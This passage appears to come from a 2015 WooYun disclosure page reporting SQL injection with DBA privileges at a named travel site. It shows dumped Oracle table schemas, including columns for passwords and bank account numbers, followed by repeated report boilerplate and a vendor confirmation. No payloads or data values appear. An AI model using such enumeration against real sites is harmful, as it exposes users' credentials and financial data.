| ORDER_POWER_FIELD   | VARCHAR2 |
| ORDER_TICKET        | NUMBER   |
| PARENT_AGENT_ID     | NUMBER   |
| PARENT_CUST_ID      | NUMBER   |
| PAY_MODE            | NUMBER   |
| PRICESTATE_PUSHMAIL | VARCHAR2 |
| PROD_COUNT          | NUMBER   |
| REG_DATE            | DATE     |
| REG_IP              | VARCHAR2 |
| REMARK              | VARCHAR2 |
| REPORT_POWER        | VARCHAR2 |
| RETURN_MODE         | NUMBER   |
| SALE_CHANNEL        | VARCHAR2 |
| SALE_COUNT          | NUMBER   |
| SALE_MONEY          | NUMBER   |
| SALE_TICKET         | NUMBER   |
| SALE_TYPE           | NUMBER   |
| SEAL_PATH           | VARCHAR2 |
| SENDMSG_MOBILE      | VARCHAR2 |
| SENDMSG_SMS         | VARCHAR2 |
| SERVICE_FEE_PAY     | NUMBER   |
| SOURCE_URL          | VARCHAR2 |
| STATE               | NUMBER   |
| STOP_DATE           | DATE     |
| STOP_IP             | VARCHAR2 |
| STOP_USER           | VARCHAR2 |
| USER_ID             | VARCHAR2 |
| VIP                 | NUMBER   |
| WHILE_RELCODE       | VARCHAR2 |
+---------------------+----------+
Database: SAAS14
Table: PAY_MOMEY_LOG
[17 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| CUR_BALANCE          | NUMBER   |
| CUST_ID              | NUMBER   |
| ID                   | NUMBER   |
| PARENT_CUST_ID       | NUMBER   |
| PAY_ACCOUNT          | VARCHAR2 |
| PAY_BALANCE_ID       | NUMBER   |
| PAY_DATE             | DATE     |
| PAY_LOG              | CLOB     |
| PAY_NUM              | NUMBER   |
| PAY_SERVICE          | VARCHAR2 |
| PAY_SERVICE_ORDER_ID | VARCHAR2 |
| PAY_TYPE             | NUMBER   |
| REC_BALANCE          | NUMBER   |
| STATE                | NUMBER   |
| USER_ID              | VARCHAR2 |
| USER_REMARK          | CLOB     |
| WORKFLOWNO           | VARCHAR2 |
+----------------------+----------+
Database: SAAS14
Table: USR_MEMBER
[26 columns]
+-------------------+----------+
| Column            | Type     |
+-------------------+----------+
| ACCOUNT           | VARCHAR2 |
| ACCOUNT_NAME      | VARCHAR2 |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO   | VARCHAR2 |
| BANK_CITY         | VARCHAR2 |
| BANK_NAME         | VARCHAR2 |
| BANK_PROVINCE     | VARCHAR2 |
| BANK_TYPE         | VARCHAR2 |
| BOOK_COUNT        | NUMBER   |
| DEPOSIT           | NUMBER   |
| EMAIL             | VARCHAR2 |
| IMG               | VARCHAR2 |
| LAST_LOGIN        | DATE     |
| LOGIN_COUNT       | NUMBER   |
| LOGIN_TYPE        | NUMBER   |
| MOBILE            | VARCHAR2 |
| ORDER_COUNT       | NUMBER   |
| ORDER_CUST_ID     | NUMBER   |
| OUT_USER_ID       | VARCHAR2 |
| PARENT_CUST_ID    | NUMBER   |
| PASSWORD          | VARCHAR2 |
| REG_DATE          | DATE     |
| STATUS            | NUMBER   |
| USER_ID           | NUMBER   |
| USER_NAME         | VARCHAR2 |
| VCODE             | VARCHAR2 |
+-------------------+----------+
Database: SAAS14
Table: WX_USER_INFO
[21 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| AREA_ID          | NUMBER   |
| CITY             | VARCHAR2 |
| COUNTRY          | VARCHAR2 |
| CREATE_DATE      | DATE     |
| CUST_ID          | NUMBER   |
| HEADIMGURL       | VARCHAR2 |
| LOGIN_DATE       | DATE     |
| NICKNAME         | VARCHAR2 |
| OPENID           | VARCHAR2 |
| ORDER_CUST_ID    | NUMBER   |
| PARENT_CUST_ID   | NUMBER   |
| PROVINCE         | VARCHAR2 |
| SEX              | NUMBER   |
| SOURCE_ID        | NUMBER   |
| STATE            | NUMBER   |
| SUBSCRIBE_TIME   | DATE     |
| TREE_ID          | NUMBER   |
| UNSUBSCRIBE_TIME | DATE     |
| USER_ID          | VARCHAR2 |
| USER_LANGUAGE    | VARCHAR2 |
| USER_MEMO        | VARCHAR2 |
+------------------+----------+
Database: SAAS14
Table: USR_LOGIN
[32 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| CUST_ID          | NUMBER   |
| CZ_STARTTIME     | DATE     |
| CZCODE           | VARCHAR2 |
| DEPT_ID          | NUMBER   |
| DUTY_STATE       | NUMBER   |
| DYCON            | VARCHAR2 |
| DYSHOW           | NUMBER   |
| EMAIL            | VARCHAR2 |
| FAX              | VARCHAR2 |
| IS_CZ            | NUMBER   |
| IS_DISPRICE      | NUMBER   |
| IS_MANAGER       | NUMBER   |
| IS_ORDERLIST     | NUMBER   |
| IS_PAY           | NUMBER   |
| IS_SHOWSYSTEMMSG | NUMBER   |
| IS_VALIDATE      | NUMBER   |
| LAST_DATE        | DATE     |
| LAST_IP          | VARCHAR2 |
| LOGIN_COUNT      | NUMBER   |
| LYT_ID           | VARCHAR2 |
| MOBILE           | VARCHAR2 |
| PARENT_AGENT_ID  | NUMBER   |
| PASSWORD         | VARCHAR2 |
| PHONE            | VARCHAR2 |
| PWD              | VARCHAR2 |
| ROLE_ID          | NUMBER   |
| ROLE_TYPE        | NUMBER   |
| USER_GRADE       | NUMBER   |
| USER_ID          | VARCHAR2 |
| USER_NAME        | VARCHAR2 |
| USER_PERMISSION  | VARCHAR2 |
| USER_STATE       | NUMBER   |
+------------------+----------+

漏洞证明：

如上

修复方案：

过滤修复

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-11-09 17:56

厂商回复：

thx

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152911

漏洞标题：驴妈妈旅游网某站某处存在SQL注入（DBA权限+20个库+400多用户+18个管理员+数万记录信息）

相关厂商：驴妈妈旅游网

漏洞作者：路人甲

提交时间：2015-11-09 09:09

修复时间：2015-12-24 17:58

公开时间：2015-12-24 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152911

漏洞标题：驴妈妈旅游网某站某处存在SQL注入（DBA权限+20个库+400多用户+18个管理员+数万记录信息）

相关厂商：驴妈妈旅游网

漏洞作者： 路人甲

提交时间：2015-11-09 09:09

修复时间：2015-12-24 17:58

公开时间：2015-12-24 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0152911"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云